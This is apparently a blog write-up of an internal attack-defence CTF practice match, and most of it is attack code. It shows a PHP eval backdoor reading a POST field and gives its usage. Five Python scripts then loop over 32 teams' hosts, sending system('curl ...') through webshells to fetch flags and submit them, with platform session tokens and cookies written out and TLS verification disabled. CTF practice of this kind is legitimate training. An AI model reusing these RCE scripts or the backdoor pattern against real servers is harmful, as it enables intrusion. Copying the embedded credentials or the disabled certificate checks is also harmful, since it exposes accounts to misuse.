May 17th, 2023
没啥含金量,一次内部的练习赛,是个人赛,记录下来是觉得这个平台很有意思。2个半小时,一人运维6台机器,都是web机器,tql。上来就直接打,压根没有fix阶段,我全程都在写attack脚本,所以压根没管fix,感觉师傅们都有点摆烂,所以还是我侥幸拿了第一。
6台机器,有一台ssh上不去,应该是平台的问题。4台机子都是直接内置eval后门,d盾扫一下就出来了,还有一台也是内置后门,只不过做了点手段
//action.php <?php require_once("library/common.php"); require_once("library/view.php"); /* 'page' comes straight from the request body; filter() is defined elsewhere (not shown) and is the only check before '.php' is appended and the file is included below */ $page = filter($_POST['page']).'.php'; $post_data = array(); foreach ($_POST as $key => $value) { $post_data[$key] = $value; } /* $post_data is filled but never read in this listing */ if (file_exists($page)) { /* backdoor sink: the raw POST field 'pages' is handed to eval() with @ suppressing errors; the file_exists() gate only requires an existing page name such as 'action' (see the usage line below), which is the eval-on-$_POST pattern the post says a static scan flagged */ @eval($_POST['pages']); @require_once($page); } ?>
用法也简单
action.php?page=action&pages=phpinfo();
只不过这个平台好有意思,需要使用gamebox去curl请求平台,然后平台返回一个flag,将这个flag提交即可得分。也就是说flag压根不在gamebox上,想要拿到flag简单的路径穿越这个压根不行,必须要rce获取到gamebox权限才能拿到flag。于是乎搓脚本就完事了。
"""Flag poller for the web1 service of the practice-match range in this post.

Every sweep it visits each team's host 4.2.<team>.1 (teams 1-32), posts a
``system()`` call to the backdoored page, pulls the first ``flag{...}`` token
out of the reply and hands it to the platform's saveAttack API.  Only request
timeouts are caught; any other exception ends the script.
"""
import re
import time

import requests

TEAM_IDS = range(1, 33)
SHELL_URL = "http://4.2.{}.1/application/admin/template/webshell.php"
# The gamebox holds no flag itself; the command asks it to fetch one from the
# platform, which is why the answer comes back in the HTTP response body.
SHELL_FORM = "key=system('curl -k https://192.18.1.253/Getkey/index/index');"
SUBMIT_URL = "https://192.18.1.253/api/comp/question/saveAttack"
SUBMIT_FORM = "comp_id=5&uanswer={}&id=29&question_id=10364"
FLAG_RE = re.compile(r'flag\{(.+?)\}')

PROBE_HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
}

# NOTE(review): the "token" header and the PHPSESSID/token cookie are platform
# credentials embedded verbatim in a published listing.  Treat them as leaked
# and invalidate them server-side; anyone holding them can submit answers as
# this account until that happens.
SUBMIT_HEADERS = {
    "Host": "192.18.1.253",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
    "Accept": "application/json, text/plain, */*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "token": "iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
    "Origin": "https://192.18.1.253",
    "Connection": "close",
    "Referer": "https://192.18.1.253/",
    "Cookie": "think_language=zh-CN; PHPSESSID=7cobrm88u0p4pn2duo37snoss1; token=iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
}


def _answer_from(body):
    """Return ``flag{...}`` found in *body*, or *body* itself when there is none.

    A missing flag is reported on stdout and the whole response text is still
    used as the answer, exactly as the writeup's loop does.
    """
    hit = FLAG_RE.search(body)
    if hit is None:
        print('未找到 flag{} 标记')
        return body
    answer = 'flag{' + hit.group(1) + '}'
    print(answer)
    return answer


def _submit(answer):
    """POST *answer* to the scoreboard and echo the platform's reply to stdout."""
    # verify=False disables TLS certificate checking for this call, so the
    # credentials above would also be sent to anything impersonating the host.
    reply = requests.post(SUBMIT_URL, headers=SUBMIT_HEADERS,
                          data=SUBMIT_FORM.format(answer), verify=False)
    # unicode_escape presumably turns \uXXXX escapes in the reply back into
    # readable text - confirm against an actual platform response.
    print(reply.content.decode('unicode_escape'))


while True:
    for team in TEAM_IDS:
        try:
            probe = requests.post(url=SHELL_URL.format(team), data=SHELL_FORM,
                                  headers=PROBE_HEADERS, timeout=1)
            _submit(_answer_from(probe.text))
        except requests.exceptions.Timeout:
            print("超时")
    # NOTE(review): indentation was lost in the published listing; the pause is
    # read as once per full sweep rather than once per host - confirm.
    time.sleep(60)
"""Flag poller for the web2 service of the practice-match range in this post.

Every sweep it visits each team's host 4.2.<team>.2 (teams 1-32) and drives the
action.php backdoor shown above: ``page`` names an existing include and
``pages`` is the code handed to eval().  The first ``flag{...}`` token in the
reply is submitted to the platform's saveAttack API.  Only request timeouts are
caught; any other exception ends the script.
"""
import re
import time

import requests

TEAM_IDS = range(1, 33)
SHELL_URL = "http://4.2.{}.2/action.php"
# The gamebox holds no flag itself; the command asks it to fetch one from the
# platform, which is why the answer comes back in the HTTP response body.
SHELL_FORM = "page=action&pages=system('curl -k https://192.18.1.253/Getkey/index/index');"
SUBMIT_URL = "https://192.18.1.253/api/comp/question/saveAttack"
SUBMIT_FORM = "comp_id=5&uanswer={}&id=30&question_id=10361"
FLAG_RE = re.compile(r'flag\{(.+?)\}')

PROBE_HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
}

# NOTE(review): the "token" header and the PHPSESSID/token cookie are platform
# credentials embedded verbatim in a published listing.  Treat them as leaked
# and invalidate them server-side; anyone holding them can submit answers as
# this account until that happens.
SUBMIT_HEADERS = {
    "Host": "192.18.1.253",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
    "Accept": "application/json, text/plain, */*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "token": "iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
    "Origin": "https://192.18.1.253",
    "Connection": "close",
    "Referer": "https://192.18.1.253/",
    "Cookie": "think_language=zh-CN; PHPSESSID=7cobrm88u0p4pn2duo37snoss1; token=iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
}


def _answer_from(body):
    """Return ``flag{...}`` found in *body*, or *body* itself when there is none.

    A missing flag is reported on stdout and the whole response text is still
    used as the answer, exactly as the writeup's loop does.
    """
    hit = FLAG_RE.search(body)
    if hit is None:
        print('未找到 flag{} 标记')
        return body
    answer = 'flag{' + hit.group(1) + '}'
    print(answer)
    return answer


def _submit(answer):
    """POST *answer* to the scoreboard and echo the platform's reply to stdout."""
    # verify=False disables TLS certificate checking for this call, so the
    # credentials above would also be sent to anything impersonating the host.
    reply = requests.post(SUBMIT_URL, headers=SUBMIT_HEADERS,
                          data=SUBMIT_FORM.format(answer), verify=False)
    # unicode_escape presumably turns \uXXXX escapes in the reply back into
    # readable text - confirm against an actual platform response.
    print(reply.content.decode('unicode_escape'))


while True:
    for team in TEAM_IDS:
        try:
            probe = requests.post(url=SHELL_URL.format(team), data=SHELL_FORM,
                                  headers=PROBE_HEADERS, timeout=1)
            _submit(_answer_from(probe.text))
        except requests.exceptions.Timeout:
            print("超时")
    # NOTE(review): indentation was lost in the published listing; the pause is
    # read as once per full sweep rather than once per host - confirm.
    time.sleep(60)
"""Flag poller for the web4 service of the practice-match range in this post.

Every sweep it issues a GET to each team's host 4.2.<team>.4 (teams 1-32) with
the command carried in the ``b`` query parameter.  Unlike the other pollers it
does no ``flag{...}`` extraction: the entire response body is printed and
submitted as the answer.  Only request timeouts are caught; any other
exception ends the script.
"""
import time

import requests

TEAM_IDS = range(1, 33)
# The command is URL text here; requests percent-encodes the spaces on send.
PROBE_URL = "http://4.2.{}.4/templates/system/index.php?b=curl -k https://192.18.1.253/Getkey/index/index"
SUBMIT_URL = "https://192.18.1.253/api/comp/question/saveAttack"
SUBMIT_FORM = "comp_id=5&uanswer={}&id=33&question_id=10358"

PROBE_HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
}

# NOTE(review): the "token" header and the PHPSESSID/token cookie are platform
# credentials embedded verbatim in a published listing.  Treat them as leaked
# and invalidate them server-side; anyone holding them can submit answers as
# this account until that happens.
SUBMIT_HEADERS = {
    "Host": "192.18.1.253",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
    "Accept": "application/json, text/plain, */*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "token": "iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
    "Origin": "https://192.18.1.253",
    "Connection": "close",
    "Referer": "https://192.18.1.253/",
    "Cookie": "think_language=zh-CN; PHPSESSID=7cobrm88u0p4pn2duo37snoss1; token=iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
}


def _submit(answer):
    """POST *answer* to the scoreboard and echo the platform's reply to stdout."""
    # verify=False disables TLS certificate checking for this call, so the
    # credentials above would also be sent to anything impersonating the host.
    reply = requests.post(SUBMIT_URL, headers=SUBMIT_HEADERS,
                          data=SUBMIT_FORM.format(answer), verify=False)
    # unicode_escape presumably turns \uXXXX escapes in the reply back into
    # readable text - confirm against an actual platform response.
    print(reply.content.decode('unicode_escape'))


while True:
    for team in TEAM_IDS:
        try:
            probe = requests.get(url=PROBE_URL.format(team),
                                 headers=PROBE_HEADERS, timeout=1)
            body = probe.text
            print(body)
            _submit(body)
        except requests.exceptions.Timeout:
            print("超时")
    # NOTE(review): indentation was lost in the published listing; the pause is
    # read as once per full sweep rather than once per host - confirm.
    time.sleep(60)
"""Flag poller for the web5 service of the practice-match range in this post.

Every sweep it visits each team's host 4.2.<team>.5 (teams 1-32), posts a
``system()`` call in the ``c`` form field of the .phtml page, pulls the first
``flag{...}`` token out of the reply and hands it to the platform's saveAttack
API.  Only request timeouts are caught; any other exception ends the script.
"""
import re
import time

import requests

TEAM_IDS = range(1, 33)
# NOTE(review): only the host part varies per team; the query string always
# names 4.2.7.5, which looks like a leftover from hand testing - confirm
# whether the page needs it at all.
SHELL_URL = "http://4.2.{}.5/images/93277ac25e12820af94c499ba23e769f.phtml?http:%2f%2f4.2.7.5%2fimages%2f93277ac25e12820af94c499ba23e769f.phtml"
# The gamebox holds no flag itself; the command asks it to fetch one from the
# platform, which is why the answer comes back in the HTTP response body.
SHELL_FORM = "c=system('curl -k https://192.18.1.253/Getkey/index/index');"
SUBMIT_URL = "https://192.18.1.253/api/comp/question/saveAttack"
SUBMIT_FORM = "comp_id=5&uanswer={}&id=32&question_id=10366"
FLAG_RE = re.compile(r'flag\{(.+?)\}')

PROBE_HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
}

# NOTE(review): the "token" header and the PHPSESSID/token cookie are platform
# credentials embedded verbatim in a published listing.  Treat them as leaked
# and invalidate them server-side; anyone holding them can submit answers as
# this account until that happens.
SUBMIT_HEADERS = {
    "Host": "192.18.1.253",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
    "Accept": "application/json, text/plain, */*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "token": "iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
    "Origin": "https://192.18.1.253",
    "Connection": "close",
    "Referer": "https://192.18.1.253/",
    "Cookie": "think_language=zh-CN; PHPSESSID=7cobrm88u0p4pn2duo37snoss1; token=iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
}


def _answer_from(body):
    """Return ``flag{...}`` found in *body*, or *body* itself when there is none.

    A missing flag is reported on stdout and the whole response text is still
    used as the answer, exactly as the writeup's loop does.
    """
    hit = FLAG_RE.search(body)
    if hit is None:
        print('未找到 flag{} 标记')
        return body
    answer = 'flag{' + hit.group(1) + '}'
    print(answer)
    return answer


def _submit(answer):
    """POST *answer* to the scoreboard and echo the platform's reply to stdout."""
    # verify=False disables TLS certificate checking for this call, so the
    # credentials above would also be sent to anything impersonating the host.
    reply = requests.post(SUBMIT_URL, headers=SUBMIT_HEADERS,
                          data=SUBMIT_FORM.format(answer), verify=False)
    # unicode_escape presumably turns \uXXXX escapes in the reply back into
    # readable text - confirm against an actual platform response.
    print(reply.content.decode('unicode_escape'))


while True:
    for team in TEAM_IDS:
        try:
            probe = requests.post(url=SHELL_URL.format(team), data=SHELL_FORM,
                                  headers=PROBE_HEADERS, timeout=1)
            _submit(_answer_from(probe.text))
        except requests.exceptions.Timeout:
            print("超时")
    # NOTE(review): indentation was lost in the published listing; the pause is
    # read as once per full sweep rather than once per host - confirm.
    time.sleep(60)
"""Flag poller for the web6 service of the practice-match range in this post.

Every sweep it visits each team's host 4.2.<team>.6 (teams 1-32) and posts a
``system()`` call in the ``shell`` form field of config.php.  Like the web4
poller it does no ``flag{...}`` extraction and prints nothing for the probe:
the entire response body is submitted as the answer.  Only request timeouts
are caught; any other exception ends the script.
"""
import time

import requests

TEAM_IDS = range(1, 33)
SHELL_URL = "http://4.2.{}.6/app/webroot/config.php"
# The gamebox holds no flag itself; the command asks it to fetch one from the
# platform, which is why the answer comes back in the HTTP response body.
SHELL_FORM = "shell=system('curl -k https://192.18.1.253/Getkey/index/index');"
SUBMIT_URL = "https://192.18.1.253/api/comp/question/saveAttack"
SUBMIT_FORM = "comp_id=5&uanswer={}&id=34&question_id=10363"

PROBE_HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
}

# NOTE(review): the "token" header and the PHPSESSID/token cookie are platform
# credentials embedded verbatim in a published listing.  Treat them as leaked
# and invalidate them server-side; anyone holding them can submit answers as
# this account until that happens.
SUBMIT_HEADERS = {
    "Host": "192.18.1.253",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
    "Accept": "application/json, text/plain, */*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "token": "iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
    "Origin": "https://192.18.1.253",
    "Connection": "close",
    "Referer": "https://192.18.1.253/",
    "Cookie": "think_language=zh-CN; PHPSESSID=7cobrm88u0p4pn2duo37snoss1; token=iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
}


def _submit(answer):
    """POST *answer* to the scoreboard and echo the platform's reply to stdout."""
    # verify=False disables TLS certificate checking for this call, so the
    # credentials above would also be sent to anything impersonating the host.
    reply = requests.post(SUBMIT_URL, headers=SUBMIT_HEADERS,
                          data=SUBMIT_FORM.format(answer), verify=False)
    # unicode_escape presumably turns \uXXXX escapes in the reply back into
    # readable text - confirm against an actual platform response.
    print(reply.content.decode('unicode_escape'))


while True:
    for team in TEAM_IDS:
        try:
            probe = requests.post(url=SHELL_URL.format(team), data=SHELL_FORM,
                                  headers=PROBE_HEADERS, timeout=1)
            _submit(probe.text)
        except requests.exceptions.Timeout:
            print("超时")
    # NOTE(review): indentation was lost in the published listing; the pause is
    # read as once per full sweep rather than once per host - confirm.
    time.sleep(60)
background
没啥含金量,一次内部的练习赛,是个人赛,记录下来是觉得这个平台很有意思。2个半小时,一人运维6台机器,都是web机器,tql
上来就直接打,压根没有fix阶段,我全程都在写attack脚本,所以压根没管fix,感觉师傅们都有点摆烂,所以还是我侥幸拿了第一
详情
6台机器,有一台ssh上不去,应该是平台的问题。4台机子都是直接内置eval后门,d盾扫一下就出来了,还有一台也是内置后门,只不过做了点手段
用法也简单
只不过这个平台好有意思,需要使用gamebox去curl请求平台,然后平台返回一个flag,将这个flag提交即可得分
也就是说flag压根不在gamebox上,想要拿到flag简单的路径穿越这个压根不行,必须要rce获取到gamebox权限才能拿到flag
于是乎搓脚本就完事了
web1
web2
web4
web5
web6